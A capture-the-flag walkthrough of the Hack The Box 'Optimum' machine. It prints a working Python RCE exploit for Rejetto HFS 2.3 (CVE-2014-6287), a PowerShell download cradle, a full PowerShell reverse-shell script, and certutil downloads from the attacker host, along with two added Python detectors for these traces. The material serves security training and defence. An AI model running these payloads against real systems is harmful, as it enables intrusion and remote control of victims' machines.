Optimum

Introduction:

Recon

# nmap -sS -sV -sC -T4 -O -oN nmap.optimum.txt  10.10.10.8
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-24 09:56 EST
Nmap scan report for 10.10.10.8
Host is up (0.014s latency).
Not shown: 999 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2012|2008|7|Vista (91%)
OS CPE: cpe:/o:microsoft:windows_server_2012 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_7::-:professional cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1
Aggressive OS guesses: Microsoft Windows Server 2012 (91%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (91%), Microsoft Windows Server 2012 R2 (91%), Microsoft Windows Server 2008 R2 (85%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (85%), Microsoft Windows 7 Professional or Windows 8 (85%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (85%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (85%), Microsoft Windows 7 Professional (85%), Microsoft Windows Vista SP2 (85%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.87 seconds

Notes:

  1. Only port 80 is open, and it is running HttpFileServer (HFS) version 2.3.
  2. The web page shows a login form and also confirms the software version.
  3. Let's fire up directory scans and enumerate the application using Burp.

Enumeration

searchsploit httpfile
----------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                     |  Path
----------------------------------------------------------------------------------- ---------------------------------
Rejetto HttpFileServer 2.3.x - Remote Command Execution (3)                        | windows/webapps/49125.py
----------------------------------------------------------------------------------- ---------------------------------

searchsploit -m  /usr/share/exploitdb/exploits/windows/webapps/49125.py
  Exploit: Rejetto HttpFileServer 2.3.x - Remote Command Execution (3)
      URL: https://www.exploit-db.com/exploits/49125
     Path: /usr/share/exploitdb/exploits/windows/webapps/49125.py
File Type: UTF-8 Unicode text, with CRLF line terminators

Copied to: hackthebox/optimum/data/49125.py

Exploitation

# Exploit Title: Rejetto HttpFileServer 2.3.x - Remote Command Execution (3)
# Google Dork: intext:"httpfileserver 2.3"
# Date: 28-11-2020
# Remote: Yes
# Exploit Author: Óscar Andreu
# Vendor Homepage: http://rejetto.com/
# Software Link: http://sourceforge.net/projects/hfs/
# Version: 2.3.x
# Tested on: Windows Server 2008 , Windows 8, Windows 7
# CVE : CVE-2014-6287

#!/usr/bin/python3

# Usage :  python3 Exploit.py <RHOST> <Target RPORT> <Command>
# Example: python3 HttpFileServer_2.3.x_rce.py 10.10.10.8 80 "c:\windows\SysNative\WindowsPowershell\v1.0\powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.4/shells/mini-reverse.ps1')"

import urllib3
import sys
import urllib.parse

try:
    http = urllib3.PoolManager()
    url = f'http://{sys.argv[1]}:{sys.argv[2]}/?search=%00{{.+exec|{urllib.parse.quote(sys.argv[3])}.}}'
    print(url)
    response = http.request('GET', url)

except Exception as ex:
    print("Usage: python3 HttpFileServer_2.3.x_rce.py RHOST RPORT command")
    print(ex)

$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.10.8 - - [24/Dec/2020 10:31:54] "GET /mini-reverse.ps1 HTTP/1.1" 200 -
10.10.10.8 - - [24/Dec/2020 10:31:54] "GET /mini-reverse.ps1 HTTP/1.1" 200 -
10.10.10.8 - - [24/Dec/2020 10:31:54] "GET /mini-reverse.ps1 HTTP/1.1" 200 -
10.10.10.8 - - [24/Dec/2020 10:31:54] "GET /mini-reverse.ps1 HTTP/1.1" 200 -

$socket = new-object System.Net.Sockets.TcpClient('10.10.14.15', 4444);
if($socket -eq $null){exit 1}
$stream = $socket.GetStream();
$writer = new-object System.IO.StreamWriter($stream);
$buffer = new-object System.Byte[] 1024;
$encoding = new-object System.Text.AsciiEncoding;
do
{
    $writer.Flush();
    $read = $null;
    $res = ""
    while($stream.DataAvailable -or $read -eq $null) {
        $read = $stream.Read($buffer, 0, 1024)
    }
    $out = $encoding.GetString($buffer, 0, $read).Replace("`r`n","").Replace("`n","");
    if(!$out.equals("exit")){
        $args = "";
        if($out.IndexOf(' ') -gt -1){
            $args = $out.substring($out.IndexOf(' ')+1);
            $out = $out.substring(0,$out.IndexOf(' '));
            if($args.split(' ').length -gt 1){
                $pinfo = New-Object System.Diagnostics.ProcessStartInfo
                $pinfo.FileName = "cmd.exe"
                $pinfo.RedirectStandardError = $true
                $pinfo.RedirectStandardOutput = $true
                $pinfo.UseShellExecute = $false
                $pinfo.Arguments = "/c $out $args"
                $p = New-Object System.Diagnostics.Process
                $p.StartInfo = $pinfo
                $p.Start() | Out-Null
                $p.WaitForExit()
                $stdout = $p.StandardOutput.ReadToEnd()
                $stderr = $p.StandardError.ReadToEnd()
                if ($p.ExitCode -ne 0) {
                    $res = $stderr
                } else {
                    $res = $stdout
                }
            }
            else{
                $res = (&"$out" "$args") | out-string;
            }
        }
        else{
            $res = (&"$out") | out-string;
        }
        if($res -ne $null){
            $writer.WriteLine($res)
        }
    }
}While (!$out.equals("exit"))
$writer.close();
$socket.close();
$stream.Dispose()

$ nc -lvnp 4444
listening on [any] 4444 ...
ls
dir
connect to [10.10.14.15] from (UNKNOWN) [10.10.10.8] 49165


    Directory: C:\Users\kostas\Desktop


Mode                LastWriteTime     Length Name
----                -------------     ------ ----
-a---         18/3/2017   2:11 μμ     760320 hfs.exe
-ar--         18/3/2017   2:13 μμ         32 user.txt.txt



    Directory: C:\Users\kostas\Desktop


Mode                LastWriteTime     Length Name
----                -------------     ------ ----
-a---         18/3/2017   2:11 μμ     760320 hfs.exe
-ar--         18/3/2017   2:13 μμ         32 user.txt.txt
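From the defender's side, the request the exploit above sends has a recognisable shape: a NUL byte followed by HFS macro syntax ({. ... .}) inside the search parameter. The Python checker below is an added example, not part of this writeup or of HFS; the access-log layout and the sample lines are constructed for it.

```python
# Flag HTTP requests carrying HFS macro syntax (the CVE-2014-6287 request shape).
# Added detection example; the log layout below is constructed, not HFS's own log format.
import re
from typing import List, Optional
from urllib.parse import parse_qsl, urlsplit

# Constructed sample lines. Line 2 mirrors the request the exploit on this page
# builds (a NUL byte, then an {.exec|...} macro); line 4 uses a different macro.
SAMPLE_LOG = """\
10.10.14.15 - - [24/Dec/2020:10:30:01] "GET / HTTP/1.1" 200
10.10.14.15 - - [24/Dec/2020:10:31:54] "GET /?search=%00{.+exec|c%3A%5Cwindows%5Csystem32%5Ccmd.exe.} HTTP/1.1" 200
10.10.14.15 - - [24/Dec/2020:10:32:10] "GET /?search=report%202020 HTTP/1.1" 200
10.10.14.15 - - [24/Dec/2020:10:33:00] "GET /files/?search=%7B.load%7Chttp%3A%2F%2Fexample.invalid%2Fx.%7D HTTP/1.1" 200
"""

LINE_RE = re.compile(r'^(?P<client>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/\d\.\d"')
# HFS macro syntax is {.name|args.}; the public exploit writes it as {.+exec|...}.
MACRO_RE = re.compile(r"\{\.\s*\+?\s*(?P<name>[a-z_]+)\b[^}]*\.\}", re.I)


def inspect_target(target: str) -> Optional[dict]:
    # Decode every query value and look for the two independent signals.
    for key, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        signals = []
        if "\x00" in value:      # NUL: what gets the macro past HFS's search handling
            signals.append("nul_byte")
        macro = MACRO_RE.search(value)
        if macro:                # {. ... .} never belongs in a legitimate search term
            signals.append("macro")
        if signals:
            return {"param": key, "signals": signals,
                    "macro": macro.group("name").lower() if macro else None}
    return None


def scan_log(text: str) -> List[dict]:
    # Run inspect_target over every parsable request line and collect the findings.
    findings = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        finding = inspect_target(m.group("target"))
        if finding:
            finding["client"] = m.group("client")
            findings.append(finding)
    return findings
```

Either signal alone is worth an alert; the NUL byte is the stronger one because HFS's search box has no legitimate use for it.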

Post-exploit/PrivEsc

C:\Users\Public\Downloads

certutil.exe -urlcache -f http://10.10.14.15:8000/winPEAS.bat C:\Users\Public\Downloads\winpeas.bat
****  Online  ****
CertUtil: -URLCache command completed successfully.

"c:\windows\SysNative\WindowsPowershell\v1.0\powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.15:8000/Sherlock.ps1')"

certutil.exe -urlcache -f http://10.10.14.15:8000/Sherlock.ps1 C:\Users\kostas\Desktop\Sherlock.ps1
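On the host, the steps above leave a distinctive process-creation trail: hfs.exe spawning cmd.exe or powershell.exe (that is what the {.exec.} macro does), certutil -urlcache fetching over HTTP, and a PowerShell IEX/DownloadString cradle. The checker below is an added example, not from this writeup; the 'key=value; ...' event layout uses Sysmon Event ID 1 field names but is constructed, as are the sample events.

```python
# Flag process-creation events matching the host-side footprint of the steps above.
# Added detection example; the 'key=value; ...' event layout is constructed (Sysmon
# Event ID 1 field names, not Sysmon's real XML).
import re
from typing import List

# Constructed sample events: event 2 is the shell HFS's {.exec.} macro spawns, running
# the PowerShell cradle from this page; event 3 is the certutil download; 1 and 4 are benign.
SAMPLE_EVENTS = r"""
Image=C:\Windows\System32\svchost.exe; ParentImage=C:\Windows\System32\services.exe; CommandLine=svchost.exe -k netsvcs
Image=C:\Windows\System32\cmd.exe; ParentImage=C:\Users\kostas\Desktop\hfs.exe; CommandLine=cmd.exe /c c:\windows\SysNative\WindowsPowershell\v1.0\powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.15:8000/Sherlock.ps1')
Image=C:\Windows\System32\certutil.exe; ParentImage=C:\Windows\System32\cmd.exe; CommandLine=certutil.exe -urlcache -f http://10.10.14.15:8000/winPEAS.bat C:\Users\Public\Downloads\winpeas.bat
Image=C:\Windows\System32\certutil.exe; ParentImage=C:\Windows\explorer.exe; CommandLine=certutil.exe -hashfile C:\Users\Public\setup.msi SHA256
""".strip()

EVENT_RE = re.compile(r"^Image=(?P<Image>[^;]+); ParentImage=(?P<ParentImage>[^;]+); CommandLine=(?P<CommandLine>.*)$")


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def match_rules(ev: dict) -> List[str]:
    """Return the names of the rules an event trips (empty list when benign)."""
    image, parent = basename(ev["Image"]), basename(ev["ParentImage"])
    cl = " ".join(ev["CommandLine"].split()).lower()   # normalise case and spacing
    hits = []
    # A file server has no reason to launch a shell; this is exactly what the macro does.
    if parent == "hfs.exe" and image in {"cmd.exe", "powershell.exe"}:
        hits.append("hfs_spawns_shell")
    # certutil used as a downloader (the winPEAS / Sherlock transfer above).
    if image == "certutil.exe" and "-urlcache" in cl and re.search(r"https?://", cl):
        hits.append("certutil_url_download")
    # PowerShell download cradle: IEX over a string fetched from the network.
    if re.search(r"\b(iex|invoke-expression)\b", cl) and "downloadstring(" in cl:
        hits.append("powershell_download_cradle")
    return hits


def scan_events(text: str) -> List[dict]:
    findings = []
    for line in text.splitlines():
        m = EVENT_RE.match(line)
        if m and (hits := match_rules(m.groupdict())):
            findings.append({"image": basename(m["Image"]), "parent": basename(m["ParentImage"]), "rules": hits})
    return findings
```

The parent/child rule is the one with the least noise here: HFS runs as the user kostas, so any shell with hfs.exe as its parent is worth a ticket on its own.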

Notes: